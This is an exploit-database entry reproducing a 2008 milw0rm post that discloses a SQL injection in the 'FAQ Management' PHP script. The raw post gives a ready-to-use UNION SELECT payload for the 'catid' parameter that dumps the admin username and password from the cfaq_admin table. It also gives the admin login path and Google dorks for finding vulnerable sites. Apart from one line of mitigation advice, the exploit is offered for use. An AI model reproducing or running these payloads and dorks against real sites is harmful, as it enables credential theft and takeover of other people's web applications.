header-logo
Suggest Exploit
vendor:
FAQ Management
by:
Hussin X
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: FAQ Management
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FAQ Management (catid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'catid' in the URL. The crafted query can be sent as 'catid=-1 union select concat(username,0x3a,password),2 FROM cfaq_admin--' which will return the username and password of the admin. The attacker can then use the credentials to login to the admin panel at www.[target].com/Script//admin.php

Mitigation:

Input validation should be done on the user supplied data to prevent SQL injection attacks.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| FAQ Management (catid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80
|
| DorK   : inurl:cfaq/index.php?catid=
|
| DorK   : inurl:index.php?catid=
|___________________________________________________|






Exploit: 

www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin--


AdmiN LoGiN :

www.[target].com/Script//admin.php





____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|______________________________________________________________________


                                       Im IRAQi    |    Im TrYaG I

# milw0rm.com [2008-09-30]

Navigation

Suggest Exploit

Services By CQR